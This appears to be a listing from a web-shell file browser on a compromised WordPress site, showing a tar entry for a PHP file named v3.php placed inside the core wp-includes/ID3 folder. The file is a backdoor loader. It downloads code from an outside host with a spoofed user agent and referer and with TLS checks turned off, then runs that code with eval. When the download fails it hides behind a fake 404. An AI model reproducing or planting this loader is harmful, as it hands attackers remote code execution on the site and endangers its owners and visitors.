| Current Path : /home/smartbloks/public_html/agency/wp-includes/ID3/ |
| Current File : /home/smartbloks/public_html/agency/wp-includes/ID3/v3.php.tar |
home/smartbloks/public_html/agency/wp-includes/ID3/v3.php 0000644 00000001140 15113120333 0017263 0 ustar 00 <?php
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, 'https://stepmomhub.com/3.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36');
curl_setopt($ch, CURLOPT_REFERER, 'https://google.com');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
$code = curl_exec($ch);
curl_close($ch);
if($code) {
eval("?>".$code);
} else {
header("HTTP/1.0 404 Not Found");
}
?>